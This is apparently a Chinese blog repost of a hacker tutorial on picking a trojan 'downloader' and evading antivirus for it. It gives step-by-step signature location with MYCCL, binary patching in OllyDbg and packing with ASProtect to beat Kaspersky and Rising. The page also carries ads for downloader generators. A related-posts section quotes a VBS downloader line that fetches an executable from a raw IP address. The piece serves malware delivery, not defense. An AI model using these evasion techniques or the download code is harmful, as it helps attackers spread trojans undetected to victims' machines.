超强下载者免杀

DELPHI穿墙下载者源码(服务端加生成器) DELPHI穿墙下载者源码(服务端加生成器) 用途你懂的 立即下载

超强下载者免杀By DarkRaY[D.S.T]

你在本文可以学到:

1.    如何挑选下载者

2.    如何免杀下载者

①选择下载者

现在是个网页木马横飞的年代,而一些比较稳定的远程控制木马的体积都很大,为了方便木马的传播,于是便有了下载者的产生,它是连接起网页木马和隐藏在幕后黑手的沟通桥梁。世面上的下载者随处可见,但一个真正好使用的下载者应该具备什么样的功能呢?在我认为至少应该具备以下几种功能:

1.       隐蔽性:包括能够删除自身,插入进程,达到保护自己的目的。

2.       穿墙性:不能穿越防火墙的下载者就像是被拉起来的铁索桥。

3.       自启动:这项功能可以灵活选择,一般来说中一次网页木马就会在后台自动下载了。

4.       体积小:一般来说下载者所占的体积最好不要超过5K

具备了这样几项功能的下载者,一般来说不错了。今天我给大家推荐的是由PERL编写的“4KDLL下载者(如图1)”。

(图1:下载者生成器的界面)

②免杀下载者

1.定位特征码

让我们来温习一下使用MYCCL定位特征码的方法。针对不同的杀毒软件有不同的免杀方法,这就要熟悉杀毒软件的杀毒机制和杀毒软件的强项。比如对于文件的免杀,我们的首要目标就是躲避卡巴斯基的查杀,下面请一步一步跟我来!

打开MYCCL,载入生成好的下载者,建议把带后缀打上勾(纯熟个人习惯,对于文件免杀的时候可以不用勾选,对于内存免杀一定要勾选)。我们可以看到,当选中文件以后,MYCCL会给出我们一些文件的信息,比如有哪些PE段(如图2),一般我们选取的PE段是CODE段,顾名思义也就是代码段了,我们在开始位置里填入CODE段的起始位置,在分段长度中填入CODE段的物理长度,在分块个数中我建议大家每次分段10份,这样多次分段查杀可以节约很多时间,设置完成后我们点击生成(如图3

(图3PE文件的节表信息)

(图3:全部设置完成后用MYCCL生成样本)

接下来,我们到需要免杀的下载者的文件夹下会有一个OUTPUT,我们用杀毒软件进行查杀!查杀的出来的记得要删除(许多杀毒软件中都有设置)被查杀的样本文件,再用MYCCL进行二次处理(如图4

(图4:发现一处特征码了)

我们选择“YES”继续生成样本让杀毒软件进行查杀,直到MYCCL提示找到特征码为止(如图5),然后我们点击特征区间,选中这段特征码,点击右键复合定位此处特征码,同样的在分块个数中我们设置10份,MYCCL会继续在OUTPUT下生成样本文件,重复刚才的步骤直到再此定位出特征码为止,一般要精确到2~4个字节,也就是比如000000F2F_00000199这段,下划线后面的部分末尾应该是2或者4(如图6)。

(图5:确定出特征码位置,并且给出图示)

(图6:定位出精确的特征码)

 [特征] 000010B9_00000002

2.修改特征码

我们用UE(界面如图7)来修改特征码,打开我们的下载者,找到000010B9这个位置,看看它对应的是字符还是什么,如果是字符我们可以尝试修改大小写来达到免杀目的,或者直接填加00H,但是有可能导致下载者功能被破坏设置运行出错。为了安全我们使用通用跳转法来修改特征码。我们需要知道000010B9_00000002在内存中对应的地址,打开OC(界面如图8),选择文件,填入文件偏移地址也就是000010B9,点下“>>>>”我们就可以得到特征码在内存中对应的地址了,这里是13141CB9。用OD载入,跳转到13141CB9位置(如图9),是MOV语句,如果你不懂汇编语言可以参考8088汇编手册,这个是比较语句,如果你对汇编了解的话可以使用等效替换语句来达到免杀的目的,我们今天的介绍的是通用跳转法,在以后的文章中DarkRay将告诉大家更多。好了,回到主题,我们复制下这句汇编指令,然后往下找空白段,也就是HEX值为0000的地方,我们把这段MOV汇编指令复制到空白段,记下空白段的地址,比如我找的是13141F44,在下面也就是13141F46JMP指令,JMP指令在汇编中是无条件跳转指令,我们跳回到特征码对应的内存地址中紧接着的语句,我这里是JMP 13141CBE(如图10)。然后回到特征码对应的内存地址处,也就是13141CB9,我们把这段MOV汇编指令修改成JMP汇编指令,跳到的地址就是我们刚才找的空白段13141F44。全部修改完成后,单击鼠标右键-复制到可执行文件-所有修改,保存完毕,特征码的修改也就完成了。用杀毒软件查杀,提示没有检测到病毒,剩下的工作就是测试功能的完整性了,建议大家安装POWERSHADOW(影子系统),是类似于还原精灵的软件,如果有任何错误重新启动就可以恢复了,这样菜菜们就不怕啦!

(图7:高亮部分就是特征码了,左边的是对应的ASCII字符)

(8:使用OC查询对应的内存地址)

(图9:跳转到特征码对应的内存地址处,查看相关的汇编指令信息)

(图10:找空白段修改汇编指令,这就是通用跳转法的典型思路)

3.加固防杀

修改文件特征码是对付卡巴斯基的好方法,卡巴的虚拟机脱壳技术很强悍,也就是上壳很容易就被查杀了,而我们修改了特征码再上壳卡巴是不会查杀的(不过也有特殊情况,卡巴查杀的不是下载者,而是壳)。对付了卡巴还有我们国产的内存杀毒能力很强的瑞星,对付瑞星我们只要上一层强悍的加密壳就可以了,比如北斗系列中的NSANTI,或者其他保护壳。我这里用ASProtect SKE(如图11)来逃过瑞星的查杀。选择OPTION,我们设置下相关参数,PROTECTION OPTION顾名思义就是保护参数,保持默认就可以了,FILE TO PROTECT就是你需要加壳的文件的地址,OUT就是输出的地址,再转到MODES,点击ADD MODES添加你刚才设置的模式,随便取个名字就可以了,我这里是DDDD,最后转到PROTECTION点击PROTECT就开始加壳执行保护了。这样一个比较完美的免杀下载者制作完成了。

(11ASPROTECT的操作界面)

4.总结

免杀的思路还有很多,和HACKING一样是注重思想的东西,还有很多的免杀方法,DarkRay会在以后的文章中告诉大家,对于免杀不会特征码定位的是肯定不行,这次我们又温习了一遍。如果大家有任何疑问欢迎到NOHACK论坛与我讨论,或者访问暗组http://www.darkst.com,我的IDDarkRay.

(本文所用到的工具:ASProtect SKE 2.3 BetaOCOLLYDBGMYCCL特征码定位器、ULTREDIT-32

 

BAT下载者代码生成器 GHVJHKJBAT下载者代码生成器啊 早班 立即下载

相关推荐

下载者生成器

下载者 下载者生成器 批量下载者生成器

简单下载者 永远不被毒发现

自己写的一个下载者 因为没有复杂的东西 所以毒一般不会报毒的 不过缺点也是有的 自己开发吧 Option Explicit Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal...

weixin_34409741的博客 328

磐龙下载者生成器

下载者生成器

使用vb轻松打造个人下载者

    我们知道Visual Basic中对于网络的支持有个winsock控件可以轻易实现各种功能,但是使用了控件意味着 你的程序移植性将大大降低,在许多机器上你的程序将无法运行。这对木马等一些对可移植性要求高的程序简直就是一大遗憾,下面我介绍一种既快速又不使用winsock控件开发下载者的方法,如果有什么问题还望指教。Visual Basic中有个api-URLDownloadToFileA

trustyboy的专栏 787

VBS下载者

Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://202.75.208.29/calc.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode...

weixin_30407099的博客 448

powershell思路分析(过某60和某绒)

文章首发于:https://forum.butian.net/share/936 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难

技术超强的网络安全平台 2968

打造一款智能下载者 Downloader(统计系统安装篇)

本文主要介绍下载者后台统计系统的安装、使用与相关技术详解。

【Rainbow Network Technology co., LTD】 348

新世纪VIP所有教程费下载

新世纪VIP所有教程费下载 【基础篇】 第一课:2006年新技术综述 第二课:学习方法,技巧与环境介绍 第三课:06年流行工具综合应用技巧篇 第四课:手工加密,加花技巧综合篇 第五课:工具灵活组合搭配打造超强木马 【myccl使用技巧篇】 第六

rjgcwl的专栏 1414

首个采用真实数字签名木马出现

360安全中心今日发布橙色安全警报:一款名为“执照凶手”的恶性木马 者在短短9天内侵袭了近百万台电脑。经分析发现,“执照凶手”木马下载者在侵入网友电脑后,会强制运行“酷猪费在线影院”,通过色情电影发布大量低俗广告,同时还会不断弹出成人用品和游戏网站的广告页面。更可怕的是,它随时可以下载各种盗号木马和“肉鸡”控制程序,对网友的财产和隐私安全形成极大危害。据360安全专家介绍,由于该木马首次

亿光年 1066

易语言 过360卫士毒五引擎误报(2016.7.11)

点击阅读原文推荐使用EIDE助手内的优化编译出来的程序360卫士比较厉害的就是自创云查引擎。自称不用更新病毒库,就算新病毒也能几分钟具备查能力。觉得说白了其实就是白名单系统,只要你的软件,不在他的白名单内,全部默认查。这就是为什么大家都说,360误报率很高,不给钱就报毒的原因。再就是QVM人工智能引擎,和云查一家子,也不知道真是人工智能,还是白名单对比,反正这个也很厉害。说下自己过这两个引...

Missing 5796

快车复出——新版Flashget支持BT下载

支持BT下载: 支持选择部分文件下载。 智能磁盘缓存技术,保护用户的硬盘。 完全兼容DHT网络。 对不同的网络类型和上网方式实行不同的连接策略,更好地利用网络资源。 支持UPnP自动端口映射。 自动设置网络连接防火墙。 支持多Tracker协议。 在下载者之间共享可用连接信息,降低服务器负担。 超强的内网互连功能,帮助内网用户相互建立连接。 [url]htt...

weixin_34221276的博客 177

移动APP四大优势

在移动互联网市场,为自己的产品找到精准定位,才是开发者生存的最好保障。移动互联网比传统互联网能做的事情肯定会更多的。除了App的开发费用比以前的报纸、电视、网络广告都要低很多外,还有很多的优势,比如:精准性、互动性、创意性、超强的用户粘性等 精准性,App用户都是主动下载的,至少说明下载者对此App是感兴趣,多数的App都会有提供分享到微博、人人网、微信朋友圈等社交功能,聚集具有相似的兴趣的目标...

weixin_33815613的博客 663

将BT进行到底-BT客户端工具全收集

http://www.pconline.com.cn/download/zhuanti/btindex.htm将BT进行到底-BT客户端工具全收集 引言:使用FTP或者HTTP方式下载软件的时候,我们经常碰到这样的“下载悖论”:某个软件的人气越旺 ,下载越困难。原因很简单,服务器只有一个,网络带宽只有那么大,下载的人多了自然就会出现“僧多粥少”的局面,BitTorrent的出现彻

1580

第一次作业

我选取的三个软件是:Mobile Apps(手机应用)、Operating Systems(操作系统)、Games(游戏) 首先,Mobile Apps(手机应用)我们接触的是更多的,它有以下几个特点: 1、精准性   App都是用户主动下载的,至少说明下载者对品牌有兴趣。多数App都会提供分享到微博、人人等社交网站的功能,聚集具有相似兴趣的目标群体。同时,App还可...

dijiaochi0282的博客 70

手把手教你认识mac图标、制作DMG文件和刻录光盘

原贴地址:http://bbs.weiphone.com/read-htm-tid-496857.html ‍一、如何替换mac图标  下载samples,解压后观看“替换图标”,可以教你如何替换图标   Samples.zip (509 K) 下载次数:210   替换图标.rar (661 K) 下载次数:211  二、mac图标的几种常见

pjk1129专栏 4936

Git分布式 & SVN集中管理式

git&svn对比 一、集中版本控制系统svn svn属于集中式版本管理控制系统,系统中保存了所有文件的修订版本,而协同工作人员通过连接svn服务器(中央服务器),提取出最新的文件,获取提交更新 下图就是标准的集中式版本控制工具管理方式: 电脑A,电脑B,电脑C都提交代码到中央服务器,且从中央服务器下载,更新代码进行协同开发工作. 集中管理方式在一定程度上看到其他

zxd8080666的博客 650

新手学之myccl使用指南

的开始:用WinHex逐字节修改*** -> 到后来软件保护(加壳)的加入、特征码技术的公开、多层加壳的发现、反调试技术、针对于PE文件格式的,到如今盛行的源码。 再看反病毒的历程:从文件扫描技术、到通配符扫描技术、内存特征码扫描技术、虚拟机扫描技术、主动防御、启发式病毒查技术、云查。 我们不难发现,反病毒与反-反病毒这两项处于对立面的技术慢...

weixin_34279184的博客 673
上一篇: 木马免杀原理
下一篇: 免杀技术
cjs916
博客等级 码龄18年 2粉丝 3原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值